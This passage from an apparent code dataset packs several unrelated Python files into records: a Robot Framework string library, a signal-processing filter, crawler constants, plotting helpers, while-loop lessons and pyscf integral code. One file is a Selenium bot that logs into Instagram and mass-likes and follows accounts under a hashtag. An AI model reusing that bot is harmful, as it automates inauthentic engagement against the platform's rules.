|\n | ``[UPPER]`` | Uppercase ASCII characters from ``A`` to ``Z``. |\n | ``[LETTERS]`` | Lowercase and uppercase ASCII characters. |\n | ``[NUMBERS]`` | Numbers from 0 to 9. |\n\n Examples:\n | ${ret} = | Generate Random String |\n | ${low} = | Generate Random String | 12 | [LOWER] |\n | ${bin} = | Generate Random String | 8 | 01 |\n | ${hex} = | Generate Random String | 4 | [NUMBERS]abcdef |\n | ${rnd} = | Generate Random String | 5-10 | # Generates a string 5 to 10 characters long |\n\n Giving ``length`` as a range of values is new in Robot Framework 5.0.\n \"\"\"\n if length == '':\n length = 8\n if isinstance(length, str) and re.match(r'^\\d+-\\d+$', length):\n min_length, max_length = length.split('-')\n length = randint(self._convert_to_integer(min_length, \"length\"),\n self._convert_to_integer(max_length, \"length\"))\n else:\n length = self._convert_to_integer(length, 'length')\n for name, value in [('[LOWER]', ascii_lowercase),\n ('[UPPER]', ascii_uppercase),\n ('[LETTERS]', ascii_lowercase + ascii_uppercase),\n ('[NUMBERS]', digits)]:\n chars = chars.replace(name, value)\n maxi = len(chars) - 1\n return ''.join(chars[randint(0, maxi)] for _ in range(length))\n\n def get_substring(self, string, start, end=None):\n \"\"\"Returns a substring from ``start`` index to ``end`` index.\n\n The ``start`` index is inclusive and ``end`` is exclusive.\n Indexing starts from 0, and it is possible to use\n negative indices to refer to characters from the end.\n\n Examples:\n | ${ignore first} = | Get Substring | ${string} | 1 | |\n | ${ignore last} = | Get Substring | ${string} | | -1 |\n | ${5th to 10th} = | Get Substring | ${string} | 4 | 10 |\n | ${first two} = | Get Substring | ${string} | | 1 |\n | ${last two} = | Get Substring | ${string} | -2 | |\n \"\"\"\n start = self._convert_to_index(start, 'start')\n end = self._convert_to_index(end, 'end')\n return string[start:end]\n\n @keyword(types=None)\n def strip_string(self, string, mode='both', characters=None):\n \"\"\"Remove leading and/or trailing whitespaces from the given string.\n\n ``mode`` is either ``left`` to remove leading characters, ``right`` to\n remove trailing characters, ``both`` (default) to remove the\n characters from both sides of the string or ``none`` to return the\n unmodified string.\n\n If the optional ``characters`` is given, it must be a string and the\n characters in the string will be stripped in the string. 
Please note,\n that this is not a substring to be removed but a list of characters,\n see the example below.\n\n Examples:\n | ${stripped}= | Strip String | ${SPACE}Hello${SPACE} | |\n | Should Be Equal | ${stripped} | Hello | |\n | ${stripped}= | Strip String | ${SPACE}Hello${SPACE} | mode=left |\n | Should Be Equal | ${stripped} | Hello${SPACE} | |\n | ${stripped}= | Strip String | aabaHelloeee | characters=abe |\n | Should Be Equal | ${stripped} | Hello | |\n \"\"\"\n try:\n method = {'BOTH': string.strip,\n 'LEFT': string.lstrip,\n 'RIGHT': string.rstrip,\n 'NONE': lambda characters: string}[mode.upper()]\n except KeyError:\n raise ValueError(\"Invalid mode '%s'.\" % mode)\n return method(characters)\n\n def should_be_string(self, item, msg=None):\n \"\"\"Fails if the given ``item`` is not a string.\n\n The default error message can be overridden with the optional ``msg`` argument.\n \"\"\"\n if not is_string(item):\n self._fail(msg, \"'%s' is %s, not a string.\", item, type_name(item))\n\n def should_not_be_string(self, item, msg=None):\n \"\"\"Fails if the given ``item`` is a string.\n\n The default error message can be overridden with the optional ``msg`` argument.\n \"\"\"\n if is_string(item):\n self._fail(msg, \"'%s' is a string.\", item)\n\n def should_be_unicode_string(self, item, msg=None):\n \"\"\"Fails if the given ``item`` is not a Unicode string.\n\n On Python 3 this keyword behaves exactly the same way `Should Be String`.\n That keyword should be used instead and this keyword will be deprecated.\n \"\"\"\n if not is_string(item):\n self._fail(msg, \"'%s' is not a Unicode string.\", item)\n\n def should_be_byte_string(self, item, msg=None):\n \"\"\"Fails if the given ``item`` is not a byte string.\n\n Use `Should Be String` if you want to verify the ``item`` is a string.\n\n The default error message can be overridden with the optional ``msg`` argument.\n \"\"\"\n if not is_bytes(item):\n self._fail(msg, \"'%s' is not a byte string.\", item)\n\n def should_be_lower_case(self, string, msg=None):\n \"\"\"Fails if the given ``string`` is not in lower case.\n\n For example, ``'string'`` and ``'with specials!'`` would pass, and\n ``'String'``, ``''`` and ``' '`` would fail.\n\n The default error message can be overridden with the optional\n ``msg`` argument.\n\n See also `Should Be Upper Case` and `Should Be Title Case`.\n \"\"\"\n if not string.islower():\n self._fail(msg, \"'%s' is not lower case.\", string)\n\n def should_be_upper_case(self, string, msg=None):\n \"\"\"Fails if the given ``string`` is not in upper case.\n\n For example, ``'STRING'`` and ``'WITH SPECIALS!'`` would pass, and\n ``'String'``, ``''`` and ``' '`` would fail.\n\n The default error message can be overridden with the optional\n ``msg`` argument.\n\n See also `Should Be Title Case` and `Should Be Lower Case`.\n \"\"\"\n if not string.isupper():\n self._fail(msg, \"'%s' is not upper case.\", string)\n\n @keyword(types=None)\n def should_be_title_case(self, string, msg=None, exclude=None):\n \"\"\"Fails if given ``string`` is not title.\n\n ``string`` is a title cased string if there is at least one upper case\n letter in each word.\n\n For example, ``'This Is Title'`` and ``'OK, Give Me My iPhone'``\n would pass. ``'all words lower'`` and ``'Word In lower'`` would fail.\n\n This logic changed in Robot Framework 4.0 to be compatible with\n `Convert to Title Case`. 
See `Convert to Title Case` for title case\n        algorithm and reasoning.\n\n        The default error message can be overridden with the optional\n        ``msg`` argument.\n\n        Words can be explicitly excluded with the optional ``exclude`` argument.\n\n        Explicitly excluded words can be given as a list or as a string with\n        words separated by a comma and an optional space. Excluded words are\n        actually considered to be regular expression patterns, so it is\n        possible to use something like \"example[.!?]?\" to match the word\n        \"example\" on it own and also if followed by \".\", \"!\" or \"?\".\n        See `BuiltIn.Should Match Regexp` for more information about Python\n        regular expression syntax in general and how to use it in Robot\n        Framework data in particular.\n\n        See also `Should Be Upper Case` and `Should Be Lower Case`.\n        \"\"\"\n        if string != self.convert_to_title_case(string, exclude):\n            self._fail(msg, \"'%s' is not title case.\", string)\n\n    def _convert_to_index(self, value, name):\n        if value == '':\n            return 0\n        if value is None:\n            return None\n        return self._convert_to_integer(value, name)\n\n    def _convert_to_integer(self, value, name):\n        try:\n            return int(value)\n        except ValueError:\n            raise ValueError(\"Cannot convert '%s' argument '%s' to an integer.\"\n                             % (name, value))\n\n    def _fail(self, message, default_template, *items):\n        if not message:\n            message = default_template % tuple(safe_str(item) for item in items)\n        raise AssertionError(message)\n","repo_name":"robotframework/robotframework","sub_path":"src/robot/libraries/String.py","file_name":"String.py","file_ext":"py","file_size_in_byte":35484,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"13026562026","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\ndef autostep(inp, out, nbIn, nFir):\n    nbPts = min(inp.shape[1], len(out))\n\n    inAcc = np.zeros((nbIn, nFir))\n    outAcc = np.zeros(nFir)\n\n    e = np.zeros(nbPts)\n    kappa = 0.027655\n    gamma = 0.22104\n\n    mu = np.ones((nbIn, nFir)) / (nFir * nbIn + 1)\n    h = np.zeros((nbIn, nFir))\n    w = np.zeros((nbIn, nFir))\n    v = np.zeros((nbIn, nFir))\n\n    for n in tqdm(np.arange(nbPts)):\n        inAcc = np.roll(inAcc, 1, axis=1)\n        inAcc[:, 0] = inp[:, n]\n\n        outAcc = np.roll(outAcc, -1)\n        outAcc[-1] = out[n]\n\n        e[n] = outAcc[-1] - sum(sum(h * inAcc))\n\n        v = np.maximum(abs(e[n] * inAcc * w), v + gamma * mu * abs(inAcc)**2 * (abs(e[n] * inAcc * w) - v))\n\n        slice_v0 = (v == 0)\n        v[slice_v0] = 1\n        alpha = np.log(mu) + kappa * e[n] * inAcc * w / v\n        alpha[slice_v0] = np.log(mu[slice_v0])\n\n        mu = np.exp(alpha)\n        mu = mu / np.maximum(mu * inAcc**2, 1)\n\n        h = h + mu * e[n] * inAcc\n\n        w = (1 - mu * abs(inAcc)**2) * w + mu * e[n] * inAcc\n\n    return h, e\n\n\nif __name__ == \"__main__\":\n    h1 = np.zeros(100)\n    h2 = np.zeros(100)\n\n    h1[20] = 0.9\n    h2[30] = 0.8\n\n    x = np.zeros((2, 100000))\n    x[0,:] = np.random.normal(0, 1, size=100000)\n    x[1,:] = np.random.normal(0, 1, size=100000)\n\n    y = np.convolve(h1, x[0,:]) + np.convolve(h2, x[1,:])\n\n    h, e = autostep(x, y, 2, 100)\n\n    plt.figure()\n    plt.plot(h[1,:])\n    plt.show()\n\n","repo_name":"guipag/These_autostep","sub_path":"autostep.py","file_name":"autostep.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24300844381","text":"# -*- coding: utf-8 
-*-\n\ndomain='http://www.passetoncode.fr'\n\nbase_item='/panneaux-de-signalisation/'\n\nbase_sign=base_item+'panneaux/'\n\nsigns=[\n\t\t'agglomeration',\n\t\t'danger',\n\t\t'direction',\n\t\t'indication',\n\t\t'interdiction',\n\t\t'localisation',\n\t\t'obligation',\n\t\t'priorites',\n\t\t'travaux',\n\t\t'zone'\n\t]\n\nothers=[\n\t'cartouches',\n\t'ideogrammes',\n\t'panonceaux',\n\t'symboles',\n\t'balises'\t\n] \n\n","repo_name":"oliviermarin/ptc-crawler","sub_path":"ptc_crawler/ptc_crawler/constants/ptc_constants.py","file_name":"ptc_constants.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38593021431","text":"from matplotlib import pyplot as plt\n\ndef get_ab(tsne_scalars):\n    if tsne_scalars:\n        return 1, 1\n    return None, None\n\ndef make_plot(embedding, labels, save_path=None, show_plot=False):\n    plt.scatter(embedding[:, 0], embedding[:, 1], c=labels, s=0.35, alpha=0.8)\n    plt.tick_params(\n        axis='x',\n        which='both',\n        bottom=False,\n        top=False,\n        labelbottom=False\n    )\n    plt.tick_params(\n        axis='y',\n        which='both',\n        left=False,\n        right=False,\n        labelleft=False\n    )\n    if save_path is not None:\n        plt.savefig(save_path)\n    if show_plot:\n        plt.show()\n\n    plt.close()\n","repo_name":"Andrew-Draganov/GiDR-DUN","sub_path":"GDR/experiment_utils/general_utils.py","file_name":"general_utils.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"3474955841","text":"# import selenium\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport sys\nimport re\n\n\n# connect the chrome driver, log in to instagram, then search for a hashtag\n\ndriver = webdriver.Chrome(\"C:/Users/lsj40/Documents/GitHub/InstagramBot/chromedriver/chromedriver88.exe\")\ndriver.implicitly_wait(200)\ndriver.get(\"https://www.instagram.com/\") # open instagram\n\nusername_box_check = WebDriverWait(driver, 10).until(EC.presence_of_element_located\\\n((By.XPATH, '//*[@id=\"loginForm\"]/div/div[1]/div/label/input')))\n################## facebook login version\n# driver.find_elements_by_xpath('//*[@id=\"loginForm\"]/div/div[5]/button')[0].click() # log in with facebook\n\n# username_box = driver.find_elements_by_xpath('//*[@id=\"email\"]')[0]\n# username_box.send_keys(\"ID\") #facebook ID\n\n# username_box = driver.find_elements_by_xpath('//*[@id=\"pass\"]')[0]\n# username_box.send_keys(\"PW\") #facebook PW\n\n# login_button = driver.find_elements_by_xpath('//*[@id=\"loginbutton\"]')[0]\n# login_button.click() # login button\n###############\n\n\n######### log in with a dedicated instagram account\n\nusername_box = driver.find_elements_by_xpath('//*[@id=\"loginForm\"]/div/div[1]/div/label/input')[0]\nusername_box.send_keys(\"ID\")\n\nusername_box = driver.find_elements_by_xpath('//*[@id=\"loginForm\"]/div/div[2]/div/label/input')[0]\nusername_box.send_keys(\"PW\")\n\nlogin_button = driver.find_elements_by_xpath('//*[@id=\"loginForm\"]/div/div[3]/button')[0]\nlogin_button.click() # login button\n\n\n\nusername_box_check = WebDriverWait(driver, 10).until(EC.presence_of_element_located\\\n((By.XPATH, '//section/nav/div[2]/div/div/div[2]/input')))\n\ntest = driver.find_elements_by_xpath('//div[4]/div/div/div/div[3]/button[2]')[0]\nif test: # update popup window -> click the 'Not Now' button\n    test.click()\n\nsearch_hashtag = 
driver.find_elements_by_xpath('//section/nav/div[2]/div/div/div[2]/input')[0]\nsearch_hashtag.send_keys(\"#코딩\") # search for the hashtag\n\n\ntime.sleep(3)\nsearch_hashtag.send_keys(Keys.ENTER)\ntime.sleep(1)\nsearch_hashtag.send_keys(Keys.ENTER) # move to the hashtag search results page\n\ncurrent_url = driver.current_url\n\n\n# like, comment and follow features\n\ncount = 0\ncount_ = 0\none = 1\nfinish_like = False\n\nbool_ = True\nbool_following = True\n\ndef isHangul(text): # function to check whether text contains Hangul\n    #Check the Python Version\n    pyVer3 = sys.version_info >= (3, 0)\n\n    if pyVer3 : # for Ver 3 or later\n        encText = text\n        \n\n        hanCount = len(re.findall(u'[\\\\u3130-\\\\u318F\\\\uAC00-\\\\uD7A3]+', encText))\n        return hanCount > 0\n\n\ndef like_comment(): # like & comment function\n\n    global count\n    global one\n    global finish_like\n\n    print(count)\n    if count == 30:\n        \n        one = 1\n        sys.exit('The configured number of runs is finished.')\n        # or: move to the follow list and unfollow accounts with a large follower/following gap..\n\n    ################################# select the first post\n    if finish_like == False and count != 30:\n        if one == 1:\n            first_post = driver.find_elements_by_xpath('//div[1]/div/div/div[1]/div[1]/a')[0]\n            first_post.click()\n            one = 2\n\n    ################################\n    time.sleep(5)\n    \n    ############################## like \n    like_action = driver.find_elements_by_xpath('/html/body/div[5]/div[2]/div/article/div[3]/section[1]/span[1]/button')[0]\n\n    like_path = driver.find_element_by_xpath('/html/body/div[5]/div[2]/div/article/div[3]/section[1]/span[1]/button/div/span/*[name()=\"svg\"]')\n    like_text = like_path.get_attribute('aria-label')\n    if like_text == \"좋아요\":\n        print(\"clicking like\")\n        like_action.click()\n    else:\n        print(\"already liked\")\n\n    #############################\n    time.sleep(5)\n\n    ################################# follow\n\n    list_ = []\n\n    button_list = driver.find_elements_by_xpath(\"//button\")\n\n    for i in button_list:\n        list_.append(i.text)\n        time.sleep(2)\n\n    if list_[1] == '팔로잉':\n        bool_following = True\n        pass\n    else:\n        bool_following = False\n        follow_btn = driver.find_elements_by_xpath('//div[2]/div[1]/div[2]/button')[0]\n        follow_btn.click()\n    #######################################\n    time.sleep(6)\n\n    ###################################### move to the next post\n    element_list = driver.find_elements_by_xpath(\"//a\") # click '다음' (Next)\n    for j in element_list:\n        if j.text == '다음':\n            count += 1\n            bool_ = False\n            j.click()\n            break\n    \n    if count == 30:\n        exit_button = driver.find_elements_by_xpath(\"//div[5]/div[3]/button\")[0]\n        exit_button.click() \n    #####################################\n\nwhile True:\n\n    like_comment()\n\n","repo_name":"Seongju-Lee/InstagramBot-Crolling","sub_path":"InstaBot.py","file_name":"InstaBot.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70024372212","text":"# Indentation is used to indicate what statements are included inside the While Loop.\r\n\r\n# While Loop (Is a statement that will repeat a block of code as long as its condition is fulfilled.)\r\n# Syntax: while valOne > valTwo # Do Something\r\nage = 12\r\n\r\nwhile age < 18: \r\n    print (\"Still Young : \" + str(age))\r\n    age = age + 1\r\n    \r\n# Else in While Loop (Else is added to the bottom of a while loop so that it can execute code when the loop is done.)\r\n# Syntax: while valOne > valTwo # Do Something else: # Do Something \r\nage = 1\r\n\r\nwhile age < 18:\r\n    print (\"Still Young : \" + str(age))\r\n    age = age + 1\r\nelse:\r\n    print (\"Legal Age : \" + str(age))\r\n\r\n# While Loop in Collections (While Loop can be used to access every item in a 
Collection (Lists and Tuples) since it is Indexed and Ordered.)\r\n# Example 1\r\n\r\nstudentID = [202100451, 202100452, 202100453, 202100454]\r\ni = 0\r\n\r\nwhile i < 4:\r\n    print (studentID[i])\r\n    i = i + 1\r\n\r\n# Example 2\r\n\r\nstudentID = [202100451, 202100452, 202100453, 202100454,202100455]\r\ni = 0\r\n\r\nwhile i < len(studentID):\r\n    print (studentID[i])\r\n    i = i + 1\r\n\r\n# Break Keyword in While Loop (Is used to stop the loop no matter what the condition is. )\r\n# Example \r\n\r\nwhile True:\r\n    print (\"Hello Anna!\")\r\n    break\r\n\r\n# Conditions in While Loop (You can use any Conditional Statement inside a While Loop.)\r\n# Example 1 \r\n\r\nprint (\"Have you eaten yet?\")\r\n\r\nwhile True:\r\n    answer = input(\"Answer : \")\r\n    if answer == \"Yes\":\r\n        print (\"Good!\")\r\n        break\r\n    else: \r\n        print (\"Then go eat now!\")\r\n\r\n# Example 2 (You want to sort the Odd and Even Numbers)\r\n# Notes 1. Use Modulo which is %\r\n\r\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\n\r\ni = 0\r\n\r\nwhile i < len(numbers):\r\n    if (numbers[i] % 2 == 0):\r\n        print (\"Even Number : \" + str(numbers[i]))\r\n    else:\r\n        print (\"Odd Number : \" + str(numbers[i]))\r\n    i = i + 1\r\n    \r\n# Math Quiz Game\r\nlives = 3\r\ncorrectanswer = 40\r\ncorrectanswer1 = 100\r\n\r\nwhile lives > 0:\r\n    answer = int(input (\"20 + 20 = \"))\r\n    if answer == correctanswer:\r\n        print (\"Congratulations, you won!\")\r\n        break\r\n    else:\r\n        lives = lives - 1\r\nelse:\r\n    print (\"You lose, better luck next time!\")\r\n    \r\nwhile lives > 0:\r\n    answer = int(input (\"60 + 40 = \"))\r\n    if answer == correctanswer1:\r\n        print (\"Congratulations, you won!\")\r\n        break\r\n    else:\r\n        lives = lives - 1\r\nelse:\r\n    print (\"You lose, better luck next time!\") ","repo_name":"itsmeannabanana/python","sub_path":"LESSONS ABOUT WHILE LOOP.py","file_name":"LESSONS ABOUT WHILE LOOP.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2702484777","text":"import unittest\nimport numpy\nimport numpy as np\n\nfrom pyscf.pbc import gto as pgto\nimport pyscf.pbc.dft as pdft\nfrom pyscf.pbc.df import fft, pwdf, mdf\n\n\n\n\n##################################################\n#\n# port from ao2mo/eris.py\n#\n##################################################\nfrom pyscf import lib\nfrom pyscf.pbc import lib as pbclib\nfrom pyscf.pbc.dft.gen_grid import gen_uniform_grids\nfrom pyscf.pbc.dft.numint import eval_ao\nfrom pyscf.pbc import tools\n\n#einsum = np.einsum\neinsum = pbclib.einsum\n\n\"\"\"\n    (ij|kl) = \\\\int dr1 dr2 i*(r1) j(r1) v(r12) k*(r2) l(r2)\n            = (ij|G) v(G) (G|kl)\n\n    i*(r) j(r) = 1/N \\\\sum_G e^{iGr} (G|ij)\n               = 1/N \\\\sum_G e^{-iGr} (ij|G)\n\n    \"forward\" FFT:\n        (G|ij) = \\\\sum_r e^{-iGr} i*(r) j(r) = fft[ i*(r) j(r) ]\n    \"inverse\" FFT:\n        (ij|G) = \\\\sum_r e^{iGr} i*(r) j(r) = N * ifft[ i*(r) j(r) ]\n               = conj[ \\\\sum_r e^{-iGr} j*(r) i(r) ]\n\"\"\"\n\ndef general(cell, mo_coeffs, kpts=None, compact=0):\n    '''pyscf-style wrapper to get MO 2-el integrals.'''\n    assert len(mo_coeffs) == 4\n    if kpts is not None:\n        assert len(kpts) == 4\n    return get_mo_eri(cell, mo_coeffs, kpts)\n\ndef get_mo_eri(cell, mo_coeffs, kpts=None):\n    '''Convenience function to return MO 2-el integrals.'''\n    mo_coeff12 = mo_coeffs[:2]\n    mo_coeff34 = mo_coeffs[2:]\n    if kpts is None:\n        kpts12 = kpts34 = q = None\n    else:\n        kpts12 = kpts[:2]\n        kpts34 = kpts[2:]\n        q = kpts12[0] - kpts12[1]\n        #q = kpts34[1] - kpts34[0]\n    if q is None:\n        q = np.zeros(3)\n\n    
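# Transform both MO pair densities to G space: a forward FFT for the 1-2 pair and an inverse FFT for the 3-4 pair.\n    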
mo_pairs12_kG = get_mo_pairs_G(cell, mo_coeff12, kpts12)\n mo_pairs34_invkG = get_mo_pairs_invG(cell, mo_coeff34, kpts34, q)\n return assemble_eri(cell, mo_pairs12_kG, mo_pairs34_invkG, q)\n\ndef get_mo_pairs_G(cell, mo_coeffs, kpts=None, q=None):\n '''Calculate forward (G|ij) FFT of all MO pairs.\n\n TODO: - Implement simplifications for real orbitals.\n\n Args:\n mo_coeff: length-2 list of (nao,nmo) ndarrays\n The two sets of MO coefficients to use in calculating the\n product |ij).\n\n Returns:\n mo_pairs_G : (ngs, nmoi*nmoj) ndarray\n The FFT of the real-space MO pairs.\n '''\n coords = gen_uniform_grids(cell)\n if kpts is None:\n q = np.zeros(3)\n aoR = eval_ao(cell, coords)\n ngs = aoR.shape[0]\n\n if np.array_equal(mo_coeffs[0], mo_coeffs[1]):\n nmoi = nmoj = mo_coeffs[0].shape[1]\n moiR = mojR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n else:\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR, mo_coeffs[1])\n\n else:\n if q is None:\n q = kpts[1]-kpts[0]\n aoR_ki = eval_ao(cell, coords, kpt=kpts[0])\n aoR_kj = eval_ao(cell, coords, kpt=kpts[1])\n ngs = aoR_ki.shape[0]\n\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR_ki, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR_kj, mo_coeffs[1])\n\n #mo_pairs_R = einsum('ri,rj->rij', np.conj(moiR), mojR)\n mo_pairs_G = np.zeros([ngs,nmoi*nmoj], np.complex128)\n\n fac = np.exp(-1j*np.dot(coords, q))\n for i in xrange(nmoi):\n for j in xrange(nmoj):\n mo_pairs_R_ij = np.conj(moiR[:,i])*mojR[:,j]\n mo_pairs_G[:,i*nmoj+j] = tools.fftk(mo_pairs_R_ij, cell.gs, fac)\n\n return mo_pairs_G\n\ndef get_mo_pairs_invG(cell, mo_coeffs, kpts=None, q=None):\n '''Calculate \"inverse\" (ij|G) FFT of all MO pairs.\n\n TODO: - Implement simplifications for real orbitals.\n\n Args:\n mo_coeff: length-2 list of (nao,nmo) ndarrays\n The two sets of MO coefficients to use in calculating the\n product |ij).\n\n Returns:\n mo_pairs_invG : (ngs, nmoi*nmoj) ndarray\n The inverse FFTs of the real-space MO pairs.\n '''\n coords = gen_uniform_grids(cell)\n if kpts is None:\n q = np.zeros(3)\n aoR = eval_ao(cell, coords)\n ngs = aoR.shape[0]\n\n if np.array_equal(mo_coeffs[0], mo_coeffs[1]):\n nmoi = nmoj = mo_coeffs[0].shape[1]\n moiR = mojR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n else:\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR, mo_coeffs[1])\n\n else:\n if q is None:\n q = kpts[1]-kpts[0]\n aoR_ki = eval_ao(cell, coords, kpt=kpts[0])\n aoR_kj = eval_ao(cell, coords, kpt=kpts[1])\n ngs = aoR_ki.shape[0]\n\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR_ki, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR_kj, mo_coeffs[1])\n\n #mo_pairs_R = einsum('ri,rj->rij', np.conj(moiR), mojR)\n mo_pairs_invG = np.zeros([ngs,nmoi*nmoj], np.complex128)\n\n fac = np.exp(1j*np.dot(coords, q))\n for i in xrange(nmoi):\n for j in xrange(nmoj):\n mo_pairs_R_ij = np.conj(moiR[:,i])*mojR[:,j]\n mo_pairs_invG[:,i*nmoj+j] = np.conj(tools.fftk(np.conj(mo_pairs_R_ij), cell.gs, fac))\n\n return mo_pairs_invG\n\ndef get_mo_pairs_G_old(cell, mo_coeffs, kpts=None, q=None):\n '''Calculate forward (G|ij) and \"inverse\" (ij|G) FFT of all MO pairs.\n\n TODO: - Implement simplifications for real orbitals.\n\n Args:\n mo_coeff: length-2 list of (nao,nmo) ndarrays\n The two sets of MO coefficients to use in calculating the\n 
product |ij).\n\n Returns:\n mo_pairs_G, mo_pairs_invG : (ngs, nmoi*nmoj) ndarray\n The FFTs of the real-space MO pairs.\n '''\n coords = gen_uniform_grids(cell)\n if kpts is None:\n q = np.zeros(3)\n aoR = eval_ao(cell, coords)\n ngs = aoR.shape[0]\n\n if np.array_equal(mo_coeffs[0], mo_coeffs[1]):\n nmoi = nmoj = mo_coeffs[0].shape[1]\n moiR = mojR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n else:\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR, mo_coeffs[1])\n\n else:\n if q is None:\n q = kpts[1]-kpts[0]\n aoR_ki = eval_ao(cell, coords, kpt=kpts[0])\n aoR_kj = eval_ao(cell, coords, kpt=kpts[1])\n ngs = aoR_ki.shape[0]\n\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR_ki, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR_kj, mo_coeffs[1])\n\n mo_pairs_R = np.einsum('ri,rj->rij', np.conj(moiR), mojR)\n mo_pairs_G = np.zeros([ngs,nmoi*nmoj], np.complex128)\n mo_pairs_invG = np.zeros([ngs,nmoi*nmoj], np.complex128)\n\n fac = np.exp(-1j*np.dot(coords, q))\n for i in xrange(nmoi):\n for j in xrange(nmoj):\n mo_pairs_G[:,i*nmoj+j] = tools.fftk(mo_pairs_R[:,i,j], cell.gs, fac)\n mo_pairs_invG[:,i*nmoj+j] = np.conj(tools.fftk(np.conj(mo_pairs_R[:,i,j]), cell.gs,\n fac.conj()))\n\n return mo_pairs_G, mo_pairs_invG\n\ndef assemble_eri(cell, orb_pair_invG1, orb_pair_G2, q=None):\n '''Assemble 4-index electron repulsion integrals.\n\n Returns:\n (nmo1*nmo2, nmo3*nmo4) ndarray\n\n '''\n if q is None:\n q = np.zeros(3)\n\n coulqG = tools.get_coulG(cell, -1.0*q)\n ngs = orb_pair_invG1.shape[0]\n Jorb_pair_G2 = np.einsum('g,gn->gn',coulqG,orb_pair_G2)*(cell.vol/ngs**2)\n eri = np.dot(orb_pair_invG1.T, Jorb_pair_G2)\n return eri\n\ndef get_ao_pairs_G(cell, kpt=np.zeros(3)):\n '''Calculate forward (G|ij) and \"inverse\" (ij|G) FFT of all AO pairs.\n\n Args:\n cell : instance of :class:`Cell`\n\n Returns:\n ao_pairs_G, ao_pairs_invG : (ngs, nao*(nao+1)/2) ndarray\n The FFTs of the real-space AO pairs.\n\n '''\n coords = gen_uniform_grids(cell)\n aoR = eval_ao(cell, coords, kpt) # shape = (coords, nao)\n ngs, nao = aoR.shape\n gamma_point = abs(kpt).sum() < 1e-9\n if gamma_point:\n npair = nao*(nao+1)//2\n ao_pairs_G = np.empty([ngs, npair], np.complex128)\n\n ij = 0\n for i in range(nao):\n for j in range(i+1):\n ao_ij_R = np.conj(aoR[:,i]) * aoR[:,j]\n ao_pairs_G[:,ij] = tools.fft(ao_ij_R, cell.gs)\n #ao_pairs_invG[:,ij] = ngs*tools.ifft(ao_ij_R, cell.gs)\n ij += 1\n ao_pairs_invG = ao_pairs_G.conj()\n else:\n ao_pairs_G = np.zeros([ngs, nao,nao], np.complex128)\n for i in range(nao):\n for j in range(nao):\n ao_ij_R = np.conj(aoR[:,i]) * aoR[:,j]\n ao_pairs_G[:,i,j] = tools.fft(ao_ij_R, cell.gs)\n ao_pairs_invG = ao_pairs_G.transpose(0,2,1).conj().reshape(-1,nao**2)\n ao_pairs_G = ao_pairs_G.reshape(-1,nao**2)\n return ao_pairs_G, ao_pairs_invG\n\ndef get_ao_eri(cell, kpt=np.zeros(3)):\n '''Convenience function to return AO 2-el integrals.'''\n\n ao_pairs_G, ao_pairs_invG = get_ao_pairs_G(cell, kpt)\n eri = assemble_eri(cell, ao_pairs_invG, ao_pairs_G)\n if abs(kpt).sum() < 1e-9:\n eri = eri.real\n return eri\n\n##################################################\n#\n# ao2mo/eris.py end\n#\n##################################################\n\n\n\n\ncell = pgto.Cell()\ncell.atom = 'He 1. 
